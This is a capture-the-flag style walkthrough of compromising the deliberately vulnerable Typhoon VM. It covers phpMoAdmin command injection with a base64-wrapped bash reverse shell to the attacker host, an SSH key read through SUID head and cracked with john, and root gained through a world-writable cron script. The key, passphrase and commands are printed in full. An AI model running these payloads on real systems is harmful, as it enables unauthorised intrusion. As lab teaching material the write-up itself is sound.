| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
27017/tcp open mongod
34114/tcp open unknown
34329/tcp open unknown
41559/tcp open unknown
43004/tcp open unknown
49357/tcp open unknown
MAC Address: 08:00:27:2D:C0:8F (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_

Nmap done: 1 IP address (1 host up) scanned in 333.29 seconds

Start with the easy ones.

Port 21: anonymous FTP login

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ ftp 192.168.56.121
Connected to 192.168.56.121.
220 (vsFTPd 3.0.2)
Name (192.168.56.121:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -liah
229 Entering Extended Passive Mode (|||6562|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 129 4096 Oct 23 2018 .
drwxr-xr-x 2 0 129 4096 Oct 23 2018 ..
226 Directory send OK.

No files, but perhaps uploads are allowed? Let's try.

ftp> binary
200 Switching to Binary mode.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||60611|).
553 Could not create file.

Cannot create files, so there is nothing more to do here for now; move on to the other ports.

Port 2049: NFS

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ showmount -e 192.168.56.121
Export list for 192.168.56.121:
/typhoon *
┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ sudo mount -t nfs 192.168.56.121:/typhoon /tmp/infosec
┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls -liah
total 28K
923939 drwxr-xr-x 2 root root 4.0K Oct 22 2018 .
4194305 drwxrwxrwt 17 root root 12K Jul 2 08:39 ..
923940 -rw-r--r-- 1 root root 24 Oct 22 2018 .secret
923941 -rw-r--r-- 1 root root 63 Oct 24 2018 secret
923942 -rw------- 1 root root 1.8K Oct 22 2018 .secret.rsa

The export holds three files; view them in turn. .secret.rsa cannot be read: cat ran as the unprivileged kali user here, and even as local root the read would fail unless the export were configured with no_root_squash, because the default root_squash maps a remote root to nobody.

┌──(kali㉿kali)-[/tmp/infosec]
└─$ cat .secret
belong to typhoon user.

┌──(kali㉿kali)-[/tmp/infosec]
└─$ cat secret
test file
<rec0nm4st3r> R3c0n_m4steeeee3er_fl4g </rec0nm4st3r>
┌──(kali㉿kali)-[/tmp/infosec]
└─$ cat .secret.rsa
cat: .secret.rsa: Permission denied

Leetspeak; decoded it reads recon_master_flag, so this is only an easter egg. NFS yields nothing more for now; the file we lack permission for can be revisited once we have a shell.

Port 80

The nmap output lists a robots.txt on port 80 that reveals the path /mongoadmin/, so let's look at it.

The front page is nothing but an advert and its source holds nothing either. On to the mongoadmin directory.

It looks like a web front end for MongoDB; clicking stats shows a version banner:

phpMoAdmin vulnerability

The stats page reports phpMoAdmin: 1.0.9. Searching for known vulnerabilities, the first result describes the eval() injection through the object parameter (CVE-2015-2208); only the PoC is reproduced here:

curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

Next, substitute a reverse shell for the command:

┌──(kali㉿kali)-[~/tools]
└─$ curl "http://192.168.56.121/mongoadmin/index.php" -d "object=1;system('cd /tmp;/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/4242 0>&1"');exit"
zsh: no such file or directory: /dev/tcp/192.168.56.106/4242

This failed, and the error comes from zsh rather than from the target: the double quotes inside the -d string closed curl's argument, so the local shell parsed ">& /dev/tcp/..." as a redirection of its own. A raw "&" in the body would also have split the form field. So base64-encode the command and decode it on the target instead:

┌──(kali㉿kali)-[~]
└─$ echo '/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/4242 0>&1"' |base64
L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQyNDIgMD4m
MSIK

┌──(kali㉿kali)-[~]
└─$ echo "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQyNDIgMD4mMSIK" | base64 -d
/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/4242 0>&1"

Base64-encoding the payload to get a shell

Pipe the decoded output into bash. The inner double quotes still end curl's argument, but this time the unquoted part is plain base64 with no shell metacharacters, so the shell simply concatenates the pieces:

┌──(kali㉿kali)-[~/tools]
└─$ curl "http://192.168.56.121/mongoadmin/index.php" -d "object=1;system('echo "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQyNDIgMD4mMSIK" | base64 -d | bash');exit"

With a listener started beforehand, the reverse shell connects back:

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.121] 53121
bash: cannot set terminal process group (2151): Inappropriate ioctl for device
bash: no job control in this shell
www-data@typhoon:/var/www/html/mongoadmin$
www-data@typhoon:/var/www/html/mongoadmin$ whoami
whoami
www-data
www-data@typhoon:/var/www/html/mongoadmin$ ls
ls
index.php
www-data@typhoon:/var/www/html/mongoadmin$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:2d:c0:8f brd ff:ff:ff:ff:ff:ff
inet 192.168.56.121/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe2d:c08f/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:bc:90:00:31 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 8e:16:41:6c:32:c8 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
valid_lft forever preferred_lft forever
www-data@typhoon:/var/www/html/mongoadmin$ uname -a
uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@typhoon:/var/www/html/mongoadmin$ python -c 'import pty;pty.spawn("/bin/bash");'
<tml/mongoadmin$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@typhoon:/var/www/html/mongoadmin$ export TERM=xterm-color
export TERM=xterm-color
www-data@typhoon:/var/www/html/mongoadmin$

Privilege escalation

Basic enumeration

First check index.php in the current directory; it holds nothing sensitive, so enumerate the system:

www-data@typhoon:/var/www/html/mongoadmin$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
typhoon:x:1000:1000:typhoon,,,:/home/typhoon:/bin/bash
admin:x:1001:1001:,,,:/home/admin:/bin/bash
postfixuser:x:1002:1002:,,,:/home/postfixuser:/bin/bash
www-data@typhoon:/var/www/html/mongoadmin$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Nothing useful in passwd or crontab.

Enumerating home directories

Look inside /home:

www-data@typhoon:/home$ ls
ls
admin postfixuser typhoon
www-data@typhoon:/home$ cd admin
cd admin
www-data@typhoon:/home/admin$ ls -liah
ls -liah
total 32K
917516 drwxr-xr-x 4 admin admin 4.0K Oct 22 2018 .
917505 drwxr-xr-x 5 root root 4.0K Oct 23 2018 ..
917529 -rw------- 1 admin admin 40 Oct 25 2018 .bash_history
917518 -rw-r--r-- 1 admin admin 220 Oct 22 2018 .bash_logout
917517 -rw-r--r-- 1 admin admin 3.6K Oct 22 2018 .bashrc
917520 drwx------ 2 admin admin 4.0K Oct 22 2018 .cache
917519 -rw-r--r-- 1 admin admin 675 Oct 22 2018 .profile
917527 drwxr-xr-x 2 root root 4.0K Oct 25 2018 .ssh
917522 -rw-r--r-- 1 admin admin 0 Oct 22 2018 .sudo_as_admin_successful
www-data@typhoon:/home/admin$ cd .ssh
cd .ssh
www-data@typhoon:/home/admin/.ssh$ ls -liah
ls -liah
total 12K
917527 drwxr-xr-x 2 root root 4.0K Oct 25 2018 .
917516 drwxr-xr-x 4 admin admin 4.0K Oct 22 2018 ..
932596 -rw-r--r-- 1 admin admin 42 Oct 24 2018 secr3t
www-data@typhoon:/home/admin/.ssh$ cat secr3t
cat secr3t
<h0h0h0>

ph00n_typ_p0st_flag!

</h0h0h0>
www-data@typhoon:/home/admin/.ssh$ cd ../../postfixuser
cd ../../postfixuser
www-data@typhoon:/home/postfixuser$ ls -liah
ls -liah
total 20K
932184 drwxr-xr-x 2 postfixuser postfixuser 4.0K Oct 23 2018 .
917505 drwxr-xr-x 5 root root 4.0K Oct 23 2018 ..
932186 -rw-r--r-- 1 postfixuser postfixuser 220 Oct 23 2018 .bash_logout
932185 -rw-r--r-- 1 postfixuser postfixuser 3.6K Oct 23 2018 .bashrc
932187 -rw-r--r-- 1 postfixuser postfixuser 675 Oct 23 2018 .profile
www-data@typhoon:/home/postfixuser$ cd ../../typhoon
cd ../../typhoon
www-data@typhoon:/typhoon$ ls -liah
ls -liah
total 20K
923939 drwxr-xr-x 2 root root 4.0K Oct 23 2018 .
2 drwxr-xr-x 25 root root 4.0K Oct 24 2018 ..
923940 -rw-r--r-- 1 root root 24 Oct 23 2018 .secret
923942 -rw------- 1 root root 1.8K Oct 23 2018 .secret.rsa
923941 -rw-r--r-- 1 root root 63 Oct 24 2018 secret
www-data@typhoon:/typhoon$ cat .secret.rsa
cat .secret.rsa
cat: .secret.rsa: Permission denied
www-data@typhoon:/typhoon$ cat .secret
cat .secret
belong to typhoon user.
www-data@typhoon:/typhoon$ cat secret
cat secret
test file
<rec0nm4st3r> R3c0n_m4steeeee3er_fl4g </rec0nm4st3r>

The .secret.rsa file we care about is unreadable, so check whether any SUID binary can help:

www-data@typhoon:/var/www/html/cms$ find / -type f -perm -04000 -ls 2>/dev/null
<tml/cms$ find / -type f -perm -04000 -ls 2>/dev/null
14223 20 -rwsr-sr-x 1 libuuid libuuid 18904 Jun 3 2014 /usr/sbin/uuidd
14192 336 -rwsr-xr-- 1 root dip 343168 Jan 23 2013 /usr/sbin/pppd
123 40 -rwsr-xr-x 1 root root 39584 Mar 24 2014 /usr/bin/head
184 32 -rwsr-xr-x 1 root root 32464 Feb 17 2014 /usr/bin/newgrp
44 44 -rwsr-xr-x 1 root root 41336 Feb 17 2014 /usr/bin/chsh
14475 16 -rwsr-xr-x 1 root lpadmin 14336 Jul 18 2014 /usr/bin/lppasswd
14407 24 -rwsr-xr-x 1 root root 23304 Feb 11 2014 /usr/bin/pkexec
41 48 -rwsr-xr-x 1 root root 46424 Feb 17 2014 /usr/bin/chfn
14283 52 -rwsr-sr-x 1 daemon daemon 51464 Oct 21 2013 /usr/bin/at
115 68 -rwsr-xr-x 1 root root 68152 Feb 17 2014 /usr/bin/gpasswd
196 48 -rwsr-xr-x 1 root root 47032 Feb 17 2014 /usr/bin/passwd
14168 76 -rwsr-xr-x 1 root root 75256 Oct 21 2013 /usr/bin/mtr
302 152 -rwsr-xr-x 1 root root 155008 Feb 10 2014 /usr/bin/sudo
14642 88 -rwsr-sr-x 1 root mail 89216 Oct 21 2013 /usr/bin/procmail
14691 2144 -rwsr-xr-x 1 root root 2191736 Jan 2 2014 /usr/bin/vim.basic
14141 24 -rwsr-xr-x 1 root root 23104 May 8 2014 /usr/bin/traceroute6.iputils
1023 12 -rwsr-xr-x 1 root root 10344 Apr 12 2014 /usr/lib/pt_chown
144019 432 -rwsr-xr-x 1 root root 440416 May 12 2014 /usr/lib/openssh/ssh-keysign
532019 12 -rwsr-xr-x 1 root root 10528 Jun 11 2012 /usr/lib/authbind/helper
270214 16 -rwsr-xr-x 1 root root 14768 Feb 11 2014 /usr/lib/policykit-1/polkit-agent-helper-1
12275 304 -rwsr-xr-- 1 root messagebus 310800 Jul 3 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
392 12 -rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
790141 36 -rwsr-xr-x 1 root root 35608 Jun 28 2013 /sbin/mount.cifs
804667 92 -rwsr-xr-x 1 root root 94168 Nov 6 2015 /sbin/mount.nfs
658417 32 -rwsr-xr-x 1 root root 30800 Dec 16 2013 /bin/fusermount
655433 44 -rwsr-xr-x 1 root root 44680 May 8 2014 /bin/ping6
655419 96 -rwsr-xr-x 1 root root 94792 Jun 3 2014 /bin/mount
655432 44 -rwsr-xr-x 1 root root 44168 May 8 2014 /bin/ping
655452 40 -rwsr-xr-x 1 root root 36936 Feb 17 2014 /bin/su
655460 68 -rwsr-xr-x 1 root root 69120 Jun 3 2014 /bin/umount
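
As an added example (not code from the write-up), the following Python script triages a listing like the one above: it parses the find -ls format, decodes the setuid/setgid bits from the mode string, and reports setuid-root binaries that are not part of a stock install, which are the ones worth looking up on GTFOBins. The baseline set is an assumption (a hand-picked list of binaries that ship setuid on Ubuntu 14.04), and SAMPLE_LISTING is ten lines copied from the find output above.

```python
# Added example (not from the write-up): triage a `find / -perm -4000 -ls`
# listing. It decodes the mode string and flags setuid-root binaries that
# are not in a baseline of binaries that ship setuid on a stock install.
# The baseline is an assumption (a hand-picked list for Ubuntu 14.04), and
# SAMPLE_LISTING is a subset of the find output above.
from typing import List, NamedTuple


class SuidEntry(NamedTuple):
    path: str
    owner: str
    group: str
    setuid: bool
    setgid: bool
    size: int


# Assumed baseline: binaries that are setuid root on a stock Ubuntu 14.04.
STOCK_SETUID_ROOT = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/sbin/mount.nfs", "/sbin/mount.cifs",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/mtr",
    "/usr/bin/traceroute6.iputils", "/usr/bin/procmail", "/usr/bin/lppasswd",
    "/usr/sbin/pppd", "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/authbind/helper", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Ten lines copied from the find output above.
SAMPLE_LISTING = """\
14223 20 -rwsr-sr-x 1 libuuid libuuid 18904 Jun 3 2014 /usr/sbin/uuidd
14192 336 -rwsr-xr-- 1 root dip 343168 Jan 23 2013 /usr/sbin/pppd
123 40 -rwsr-xr-x 1 root root 39584 Mar 24 2014 /usr/bin/head
14283 52 -rwsr-sr-x 1 daemon daemon 51464 Oct 21 2013 /usr/bin/at
196 48 -rwsr-xr-x 1 root root 47032 Feb 17 2014 /usr/bin/passwd
302 152 -rwsr-xr-x 1 root root 155008 Feb 10 2014 /usr/bin/sudo
14642 88 -rwsr-sr-x 1 root mail 89216 Oct 21 2013 /usr/bin/procmail
14691 2144 -rwsr-xr-x 1 root root 2191736 Jan 2 2014 /usr/bin/vim.basic
655452 40 -rwsr-xr-x 1 root root 36936 Feb 17 2014 /bin/su
655432 44 -rwsr-xr-x 1 root root 44168 May 8 2014 /bin/ping
"""


def parse_find_ls(text: str) -> List[SuidEntry]:
    """Parse `find -ls` lines: inode blocks mode links owner group size M D Y path."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 11 or not parts[0].isdigit():
            continue  # prompt lines, echoed commands, blanks
        mode = parts[2]
        entries.append(SuidEntry(
            path=" ".join(parts[10:]),  # tolerate spaces in the path
            owner=parts[4],
            group=parts[5],
            setuid=mode[3] in "sS",     # 's'/'S' in the owner execute slot
            setgid=mode[6] in "sS",     # 's'/'S' in the group execute slot
            size=int(parts[6]),
        ))
    return entries


def suspicious_setuid_root(entries: List[SuidEntry],
                           baseline=STOCK_SETUID_ROOT) -> List[str]:
    """setuid-root binaries outside the baseline, in listing order."""
    return [e.path for e in entries
            if e.setuid and e.owner == "root" and e.path not in baseline]


if __name__ == "__main__":
    for path in suspicious_setuid_root(parse_find_ls(SAMPLE_LISTING)):
        print("review on GTFOBins:", path)
```

On this listing the script singles out /usr/bin/head and /usr/bin/vim.basic, exactly the two binaries that do not belong to a default install; entries owned by libuuid or daemon are setuid but not to root, so they are left out of the report.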

SUID head: arbitrary file read of the SSH key

head carries the SUID bit, and per GTFOBins a setuid head reads any file: it runs with euid 0, and -c1G simply asks for up to 1 GiB so the whole file is printed:

www-data@typhoon:/typhoon$ head -c1G .secret.rsa
head -c1G .secret.rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C5D65028BD98AC3E19489791F67CA768

/HkN7JJC6GUhdC9QqGQENXBZ4gmSFyNf3FQujcAG7FudOttBNb5uwYznR/fUHQ3Y
zySvHRxesWPSmbH+JnYZabS6J5BfNVLjo6GI/+M0uauh6g7o5FpgVQV1aezGf7VE
yH1HBMUarF2ei2ipxPI4bDTBIAOeec9HExagtzHTfryHQOD8qzglUTXRiEYP4/nz
y5akLWJp0aicgw8VzqA6JuRYgFvpaV2V7OLUEIwITpxP2q1xrEATY+N9ASM+LIUF
hwLfqCxinnzd5ObuF474qluHa2U1IoIFgOjxvQXzN1s6wqIUWPcV2w21QzoJ/cJf
Ro5nYZkygcoAHFB1ioQjPHD/HA8wjAPxyP5L1a1zR/PdsxcqqABH7TOJHLVT1ZYa
Koh5cmvch9nzTkowQpLnnOPF6smWIYAF6EzLx4Yx1E93w+0Fvvlq6ptRO+ZcNMhy
T3s31tqELLM/UbjR3O/dXOVXZuSCPG6okuy7FJ9xAW8k24FmITaHENaIYYzT74Xo
fTZjzbwY6QnSb7L+cy70r8CRBi0ESFWyEs2IWyWe8CrsZWtXLkl6O9FVE1ME1geB
UaonqZeIfG/fFlsXZTI1jYLvDC3yK1VBdb/fxqZTx+z10KenaKZEvM5IdlS8iBnv
Wtbl7v1CrTc9DL924Ul3u1sIhiKvBcu4wtoSEyUcwL08yyVJLrGr5GiKn98ZWECX
CAeXPUG2UCNQCYXXsE85u6TBVPGVlsETGtYLvRMwJAtAs79NZbuqIFXmQNGUEP8P
nLuw0cdit7sQT6AhIlmgXaqOfjKSS8gfOhVo5sHrvQTshjee0VD8Zgerqql0nqez
/yN5kLVn+XWx7SLBHmZnvatFY1KbT3j+y0Cw1kB/ckX+5Ui5fZH3ojauNA+Q5Gtt
5rfS4NeAaOYbY5ris+9zprWQ6wI8Yw82psN/sSqI4dVsv9asVkQ7/U7JD7mEEtal
u3BuhzhWMHaf+7elorzBTcTs+dTQBGh+wIRGxmhclL5tN7VQ+WJQRKp3b761LnYC
LrsWJIpqmvAEpSlvkD01erLu8yUDV2oCC4Y59+1f/xDhX3Qzgy3PYnMTlz7+YVXx
klfjpXFgZNJS+H1D8BWR22rkMwQ3x2ylq3QuL8JmAbEAzzUSBXPQY7IQpy8IQSbh
XhAopk52jhC3BZ+Pe1wI84AztSwCIcKrnJkoe2lsIu5gOQnCg91DQQqUe+G9TC+o
wDXxZMBYWsuZxQ9pN3EMto3iNedkDlMfps6ElplJS6Ci3IGtR2ceHsw/r11j+46j
zoM6pBTr8EGDjzintA9a7MhFZ/afXSRYOfxIZA6ijvc21mT838LMeQOHw414t4o7
IfpyWmlkfLNJSeWA9KcQ2t+kcM0VuTW0OAHtiNn6qTzClsryBaT2LFSNyMwIRt0p
21zYncZu5xc33XwEFZyfi3s/1K+Xw0x4rYqWaGTXQbfXciQgHqGTP0epA54/a+pg
edJ7yiGoUAOTvE82vghvTS3Qa9+jSvgGg1m1i1a0bxWT+7YSSD2Io1n+N0mDheAG
KCuixP7PfjsNiYLmZoBJIQ30WA1r+4HCQXHDU4o1zpJKy69rOMPyK28MRqI/Kf6X
-----END RSA PRIVATE KEY-----

Write the private key to a local file sshkey and try key-based login:

ssh -i sshkey typhoon@192.168.56.121

Cracking the key passphrase with john

ssh prompts for a passphrase, so crack it with john. Convert the key first with ssh2john and write the result to rsa_hash. The key is in the legacy OpenSSL PEM format (Proc-Type/DEK-Info header), whose passphrase is stretched with a single MD5 round, so a rockyou run is quick:

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ ssh2john sshkey > rsa_hash

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash
sshkey:789456123

1 password hash cracked, 0 left

The passphrase is found; log in with the key:

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ ssh -i sshkey typhoon@192.168.56.121
d888888b db db d8888b. db db .d88b. .d88b. d8b db
`~~88~~' `8b d8' 88 `8D 88 88 .8P Y8. .8P Y8. 888o 88
88 `8bd8' 88oodD' 88ooo88 88 88 88 88 88V8o 88
88 88 88~~~ 88~~~88 88 88 88 88 88 V8o88
88 88 88 88 88 `8b d8' `8b d8' 88 V888
YP YP 88 YP YP `Y88P' `Y88P' VP V8P

Vulnerable VM By PRISMA CSI - www.prismacsi.com

WARNING: Unauthorized access to this system is forbidden and will be
prosecuted by law. By accessing this system, you agree that your actions
may be monitored if unauthorized usage is suspected.

This is a joke of course :))
Please hack me!

-----------------------------------------------------------------------
Enter passphrase for key 'sshkey':
sign_and_send_pubkey: no mutual signature supported
typhoon@192.168.56.121\'s password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Sun Jul 2 20:10:31 EEST 2023

System load: 0.0 Users logged in: 0
Usage of /: 18.9% of 17.34GB IP address for eth0: 192.168.56.121
Memory usage: 40% IP address for docker0: 172.17.0.1
Swap usage: 0% IP address for virbr0: 192.168.122.1
Processes: 181

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Sun Jul 2 20:10:31 2023 from 192.168.56.106

An interesting detail: "sign_and_send_pubkey: no mutual signature supported" means the client and server could not agree on a signature algorithm for the key. The usual cause is a recent OpenSSH client (8.8 and later) that no longer offers the SHA-1 based ssh-rsa signature, which is all this 2014-era server supports; adding -o PubkeyAcceptedAlgorithms=+ssh-rsa re-enables it. Public-key authentication therefore failed and ssh fell back to password authentication, and the key passphrase happens to be the account password as well.

Writable files

The SUID list is the same one already seen as www-data, so look for writable files instead:

typhoon@typhoon:/var/www/html$ find / -type f -writable -not -path "/var*" -not -path "/proc*" -not -path "/sys*" 2>/dev/null
/tmp/7ff18ca11a1a43036e852fb2c82c62aa.dat
/tmp/b5caab02810ae00ce47f27a6151ab3d2.dat
/tmp/f71487e6e9c666dc5b99e37305c00db5.dat
/tmp/f0d37d8381109e98099ecb474141283a.dat
/tmp/c7007124bd83d0879dc799c95d5b219e.dat
/tmp/8c10a35add3f21e11383c7911852072e.dat
/tmp/a119d9ddd9ebcf658e28eac9773d7c07.dat
/tmp/65d9383ff514cbd01ac65e38806095d7.dat
/home/typhoon/.bashrc
/home/typhoon/.ssh/id_rsa
/home/typhoon/.ssh/id_rsa.pub
/home/typhoon/.ssh/known_hosts
/home/typhoon/.mysql_history
/home/typhoon/.cache/motd.legal-displayed
/home/typhoon/.bash_logout
/home/typhoon/.bash_history
/home/typhoon/.profile
/tab/script.sh

The writable list includes /tab/script.sh; check its details:

typhoon@typhoon:~$ ls -liah /tab/script.sh
536243 -rwxrwxrwx 1 root root 68 Oct 24 2018 /tab/script.sh
typhoon@typhoon:~$ cat /tab/script.sh
echo "Typhoon is UP!"

#<typh00n!> P0st_3xpl01t3R_flaqGq <typhoon!>

A root-owned shell script that everyone can write, which makes this easy: put a reverse shell in it, or have it copy bash and set the SUID bit. Either payload only pays off when root executes the script; running it ourselves just produces a copy owned by our own user, as the note at the end of this post shows.

typhoon@typhoon:~$ echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" >/tab/script.sh
typhoon@typhoon:~$ /tab/script.sh

Once root has run the script, a SUID root copy of bash sits in /tmp:

typhoon@typhoon:/tmp$ ls -liah
total 1.1M
655482 drwxrwxrwt 7 root root 4.0K Jul 3 01:16 .
2 drwxr-xr-x 25 root root 4.0K Oct 24 2018 ..
667536 -rw-rw-rw- 1 www-data www-data 33 Jul 2 17:59 65d9383ff514cbd01ac65e38806095d7.dat
667553 -rw-rw-rw- 1 www-data www-data 6 Jul 2 17:59 7ff18ca11a1a43036e852fb2c82c62aa.dat
667546 -rw-rw-rw- 1 www-data www-data 33 Jul 2 17:59 8c10a35add3f21e11383c7911852072e.dat
667550 -rw-rw-rw- 1 www-data www-data 6 Jul 2 17:59 a119d9ddd9ebcf658e28eac9773d7c07.dat
667549 -rw-rw-rw- 1 www-data www-data 6 Jul 2 17:59 b5caab02810ae00ce47f27a6151ab3d2.dat
667555 -rwsr-sr-x 1 root root 994K Jul 2 20:33 bash
667552 -rw-rw-rw- 1 www-data www-data 6 Jul 2 17:59 c7007124bd83d0879dc799c95d5b219e.dat
667548 -rw-rw-rw- 1 www-data www-data 8.2K Jul 2 17:59 f0d37d8381109e98099ecb474141283a.dat
667547 -rw-rw-rw- 1 www-data www-data 28 Jul 2 17:59 f71487e6e9c666dc5b99e37305c00db5.dat
667534 prw-r--r-- 1 www-data www-data 0 Jul 2 17:22 foo
665597 drwxr-xr-x 2 tomcat7 tomcat7 4.0K Jul 2 02:42 hsperfdata_tomcat7
659034 drwxrwxrwt 2 root root 4.0K Jul 2 02:42 .ICE-unix
659035 srwx------ 1 mongodb mongodb 0 Jul 2 02:42 mongodb-27017.sock
667554 -rw------- 1 root typhoon 4.0K Jul 2 20:37 .test.swp
665596 drwxr-xr-x 2 tomcat7 root 4.0K Jul 2 02:42 tomcat7-tomcat7-tmp
667551 drwxrwxrwx 2 www-data www-data 4.0K Jul 2 17:59 translations
658262 drwxrwxrwt 2 root root 4.0K Jul 2 02:42 .X11-unix
typhoon@typhoon:/tmp$ ./bash -p
bash-4.3# whoami
root
bash-4.3# id
uid=1000(typhoon) gid=1000(typhoon) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),112(sambashare),125(libvirtd),1000(typhoon)
bash-4.3# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:2d:c0:8f brd ff:ff:ff:ff:ff:ff
inet 192.168.56.121/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe2d:c08f/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:bc:90:00:31 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 8e:16:41:6c:32:c8 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
valid_lft forever preferred_lft forever
bash-4.3# uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
bash-4.3# cd /root
bash-4.3# ls
root-flag
bash-4.3# cat root-flag
<Congrats!>

Typhoon_r00t3r!

</Congrats!>

One puzzle remains: the first time I ran the script, the file it produced was owned by typhoon, and I even deleted /tmp/bash, yet later a root-owned bash appeared out of nowhere. I will re-import the VM and try to reproduce this; for now here is the record of the problem.

The file's modification time differs by only 3 minutes:

bash-4.3# ls -liah bash
667555 -rwsr-sr-x 1 root root 994K Jul 2 20:33 bash
bash-4.3# stat bash
File: ‘bash’
Size: 1017016 Blocks: 1992 IO Block: 4096 regular file
Device: fc00h/64512d Inode: 667555 Links: 1
